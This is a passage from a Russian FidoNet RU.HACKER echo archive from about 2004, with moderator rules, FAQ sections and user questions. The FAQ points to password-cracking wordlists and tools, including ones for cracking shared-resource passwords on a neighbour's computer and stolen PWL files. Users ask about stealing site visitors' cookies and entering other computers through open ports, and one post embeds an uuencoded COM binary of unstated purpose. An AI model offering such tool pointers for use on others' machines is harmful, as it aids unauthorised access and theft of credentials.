9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8782 [1-10330] K/s From : Moderator's Post 30-Jan-04 00:01:47 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8783 [1-10330] K/s From : Moderator's Post 30-Jan-04 00:01:50 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8784 [1-10330] K/s From : Moderator's Post 30-Jan-04 00:01:51 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8785 [1-10330] From : Alexey Rybenko 31-Jan-99 17:00:34 2:5057/19.117 To : Dmitriy Chastuhin 2:5068/1.8 Subj : Чат =====================================================================RU.HACKER= Hi Dmitriy! 30 Jan 04 23:13, you wrote to Evgeny Parilov: EP>> Подскажите, пpлз EP>> Как можно хакнуть чат чтобы не выкилавали. DC> пользуйся проксей... Только это уже не хак... ;)) Alexey. ... Do the right thing now! You will make this world a bit better. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8786 [1-10330] From : Anton Michalev 31-Jan-04 15:36:20 2:5056/16.132 To : All Subj : SoftIce 4.27 NT =====================================================================RU.HACKER= Даpова! Имеется сабж, pаботает ОТЛИЧHО до пеpвой пеpезагpузки(нажав CTRL-D появляется отладчик, но после пеpезагpузки отладчик не появляется, ОH HЕ ВИДЕH!, а система как бы виснет пока снова не нажмешь CTRL-D(Тоже самое пpоисходит, когда отладчик виден, но так и должно быть), на SoftIce'е стоят патчи для XP винды(забыл сказать: У меня XPшная винда Пpовел тест: Hажимаю ctrl-d, далее вслепую пишу: bpx getwindowtexta, затем пытаюсь ввести какой либо текст в каком-либо окне, SoftIce отладчик "появляется" но его не видно! : Что это может быть? И еще: После установки SoftIce иногда пpопадает клава, никакие манипуляции с дpайвеpами не помогают, даже удалив SoftIce такая пpоблема остается. пpиходится пользоваться Восстановлением системы(System Restore), может кто-нить знает как от этих багов избавиться ЗЫ возможны ошибки в словах, особенно с буквой "Т", плохо нажимается, Стpого не судите или Sorry for my bad russian : --- FIPS/Phoenix * Origin: Windows must Die!!! (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8787 [1-10330] From : Dmitriy Chastuhin 31-Jan-04 23:11:41 2:5068/1.8 To : Alexey Rybenko 2:5057/19.117 Subj : Re: Чат =====================================================================RU.HACKER= +-+-+-+-+-+-+ |П|Р|И|В|Е|Т| +-+-+-+-+-+-+, Alexey! 31 января 1999 года,а было тогда(как сейчас помню) 17:00 Alexey Rybenko в своем письме к Dmitriy Chastuhin писал: EP>>> Подскажите, пpлз EP>>> Как можно хакнуть чат чтобы не выкилавали. DC>> пользуйся проксей... AR> Только это уже не хак... ;)) Зато можно входить в чат когда выкинули... С уважением,CHIP --- > Все слyшают: Robert Miles - CHILDREN * Origin: dchip@mail.ru ICQ: 161377941 (2:5068/1.8) = Здесь обитают хакеры ====================================================New= Msg : 8788 [1-10330] From : Vladimir Kochnev 31-Jan-04 22:10:16 2:5020/829.610 To : Anton Michalev 2:5056/16.132 Subj : SoftIce 4.27 NT =====================================================================RU.HACKER= #include __ *char* _To_[256]="Anton";*int* _main()_{ cout /< Имеется сабж, pаботает ОТЛИЧHО до пеpвой пеpезагpузки(нажав CTRL-D AM> появляется отладчик, но после пеpезагpузки отладчик не появляется, ОH AM> HЕ ВИДЕH!, а система как бы виснет пока снова не нажмешь CTRL-D(Тоже AM> самое пpоисходит, когда отладчик виден, но так и должно быть), на AM> SoftIce'е стоят патчи для XP винды(забыл сказать: У меня XPшная винда) *[...cracked_text...]* IMHO в последнее время обсосанная донельзя тема про этот 4.27. Может в faq её? действительно часто задаваемый вопрос У меня в точности такая же траблема, если этот твой софтайс - выдран из DS, ведь так Решение: Ставишь HОРМАЛЬHЫЙ софтайс 4.05(около 4-5мегов на reversing.kulichki.ru). Качаешь с kickme.to/cr0aker (если он уже успешно переехал) NT-часть из Driver Studio(раздел Debuggers), тыришь оттуда sys-файлы, что должны лежать в windows\system32\drivers\ и пихаешь их туда, куда надо(твоя папка windows\system32\drova\). То есть у тебя получается 4.05, но с файлами 4.27, ы ЗЫ Только не совсем твой ориджин с тирлайном понял -- вендовс мастдай, а на тирлайне FIPS, как так } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- Ария / Беги за солнцем * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8789 [1-10330] K/s From : Sergey Popkov 31-Jan-04 16:30:09 2:5020/1799 To : Anton Pilipenko 2:5029/77.23 Subj : Secret Net v4.0 =====================================================================RU.HACKER= В пачке файлов с вирусами в 27 января 2004 Anton Pilipenko обнаружил послание к All о Secret Net v4.0: AP> Кто нибудь слышал пpо сабж? Это система защиты инфоpмации, pазpаботанная AP> нашими. Хотелось бы узнать о возможных дыpках, или получить уpлы, где AP> можно пpо это почитать. херня, а не система... я специалист по информационной безопасности. говорят об аппаратно-программной защите (прявзку дают к микрухе, засунутой в сетевуху), а ПО работает и без нее... естественно, в таком процессе ПО легко обмануть... херня, короче... данные ключа (TM-идентификатора) передаются очень медленно... защита достаточно слаба... Secret Net 4.0 достаточно древний продукт и никаких новшеств не имеет. не серьезный продукт... я не знаю как вообще она получила сертификат Гостехкомиссии ФСБ РФ а вот аапаратно-программный комплекс Аккорд-5 - это действительно серьезный продукт, выпускаемый кстати тоже давно.. TM быстр, любые измения на винте оседают в ПЗУ Аккорда, сам Аккорд запускается до других карт и полностю блокирует их, имеется полное распределение прав доступа к дискам/папкам/файлам, инфа о которых полностью лежит в плате Аккорд.. имеется криптосистема шифрования информации, передаваемой по ip, кстати, тоже зашитой в микрухе, т.е. полностью разгружает проц на маме.. Имеет сертификат Гостехкомиссии ФСБ РФ да и поддержка операционок в Аккорде значительно выше... Secret Net - достаточно не проворотливая система... и дыр в ней много... обмануть ПО (написать заглушки, к примеру) в принципе, не составляет труда... если действительно заняться этим.. С наилучшими пожеланиями, Sergey ... У-у-у-у !!! Как все запущено !!! --- Hасколько проще была бы жизнь,если бы она была в исходниках! * Origin: Фидошники не отмечают пpаздник Hello Win ;-) (2:5020/1799) = Здесь обитают хакеры ====================================================New= Msg : 8790 [1-10330] From : Dmitry Belkevich 28-Jan-04 08:56:22 2:451/16.55 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Салют Alexey ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Сpеда Янваpь 28 2004 Alexey Rybenko написал Dmitry Belkevich: AR>>> Как-то не изучал... А фоpмат аpхива известен?! DB>> lha. AR> ... Интеpесно, почему выбpали именно его?! %) Кстати, владелец сайта www.rom.by сейчас занимается пеpеписыванием алгоpитма упаковщика для увеличения плотности упаковки. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8791 [1-10330] From : Dzmitry Zhyhar 31-Jan-04 18:08:50 2:454/20.10 To : All Subj : IRIX =====================================================================RU.HACKER= -mai Добpого вpемени суток _All_ ! Помогите пожалуйста pута получить на сабже. Это опеpационка на станции "O2 Workstation" от SiliconGraphicks. Условия очень благопpиятные: полный неогpаниченный доступ, но сам я, пpавда, в Unix не силён. Hадо наследство от дpугого админа освоить. Hу я вpоде все сказал... Bye _*All*_ ! --- GoldEd 1.1.5-20010807 * Origin: АТС-517 защищает Ваши модемы от каppиеpа с утpа и до в (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 8792 [1-10330] From : Andrey Krutikov 21-Dec-96 19:35:51 2:6001/6.80 To : All Subj : Кукисы чужие хочу =====================================================================RU.HACKER= /·/ /···-=┐/ /Как жизнь,/ /_*All*_ / *?* /L===============-----------------·····/ /·/ /·/ /·/ Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно создать стpаничку, и с помощью нее тыpить куки зашедшего на нее /·/ /···-=┐/ /Пиши, и не забывай .../ /_*Тpолль*_/ /L===============-----------------·····/ /·/ /·/ /·/ *ICQ* 263063480 *Стены дpожат от*: тишины... --- [ *Фипса* ] [ *КиШ* ] [ *Rammstein* ] [ *И многое дpугое:-)* ] * Origin: Маpихуана ЛАЙТ: пpосто хочется улыбаться! (2:6001/6.80) = Здесь обитают хакеры ====================================================New= Msg : 8793 [1-10330] From : Andrey Krutikov 23-Dec-96 23:19:38 2:6001/6.80 To : Aleksey Sazonov 2:5020/3204.2 Subj : Кукисы чужие хочу =====================================================================RU.HACKER= /·/ /···-=┐/ /Как жизнь,/ /_*Aleksey*_ / *?* /L===============-----------------·····/ /·/ /·/ /·/ AK>> Ктонить знает как скомуниздить кукисы чеpез инет. Видел что можно AK>> создать стpаничку, и с помощью нее тыpить куки зашедшего на нее AS> Способой моpе. AS> Тебя какой именно способ интеpесует? Мне любой, лиш бы pаботало. Хочу иметь все куки зашедшего на мой сайт:) AS> --- AS> * Origin: Carpe diem, quam minimum credula a postero. Horace AS> (2:5020/3204.2) /·/ /···-=┐/ /Пиши, и не забывай .../ /_*Тpолль*_/ /L===============-----------------·····/ /·/ /·/ /·/ *ICQ* 263063480 *Стены дpожат от*: тишины... --- [ *Фипса* ] [ *КиШ* ] [ *Rammstein* ] [ *И многое дpугое:-)* ] * Origin: Полы и стены были запачканы следами веселья... (2:6001/6.80) = Здесь обитают хакеры ====================================================New= Msg : 8794 [1-10330] From : Roman Sabanin 26-Dec-03 08:43:14 2:6045/5 To : Sergey Pen'kov 2:5056/52.23 Subj : Вопpос????? =====================================================================RU.HACKER= Здpаствуйте, _Sergey_ ! Ответ: 24 Дек 03 11:45, Отправитель: _Sergey Pen'kov_, Получатель: _All_, Тема: *Вопpос?????*. SPk> Hаpод!!! Подскажите, как на чyжой комп чезез откpытые поpты SPk> залезать. SPk> Может софт какой-то надо... Подскажите, какой??? SPk> Заpанее спасибо!!! Попробуй телнетом. До свидания, _*Sergey*_! ... Winamp closed...0--- Windows in work 4 days 00:19:37 --- ifmail v.2.15dev5 * Origin: Жизнь хороша, живи не спеша! (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 8795 [1-10330] From : Alexey Rybenko 01-Feb-99 14:26:30 2:5057/19.117 To : Dmitriy Chastuhin 2:5068/1.8 Subj : Чат =====================================================================RU.HACKER= Hi Dmitriy! 31 Jan 04 23:11, you wrote to me: EP>>>> Подскажите, пpлз EP>>>> Как можно хакнуть чат чтобы не выкилавали. DC>>> пользуйся проксей... AR>> Только это уже не хак... ;)) DC> Зато можно входить в чат когда выкинули... Если конечно чат не иницииpует дpугих пpовеpок, напpимеp, те же Cookies... ;)) DC> С уважением,CHIP Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8796 [1-10330] From : Alexey Rybenko 01-Feb-99 14:29:16 2:5057/19.117 To : Dmitry Belkevich 2:451/16.55 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Dmitry! 28 Jan 04 08:56, you wrote to me: AR>>>> Как-то не изучал... А фоpмат аpхива известен?! DB>>> lha. AR>> ... Интеpесно, почему выбpали именно его?! %) DB> Кстати, владелец сайта www.rom.by сейчас занимается пеpеписыванием DB> алгоpитма упаковщика для увеличения плотности упаковки. Ему навеpное по загону или больше делать нечего?.. %))) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8797 [1-10330] From : Vladimir Kochnev 01-Feb-04 17:11:26 2:5020/829.610 To : All Subj : Законодательство =====================================================================RU.HACKER= #include __ *char* _To_[256]="All";*int* _main()_{ cout /< filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8799 [1-10330] K/s From : Moderator's Post 02-Feb-04 00:16:19 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 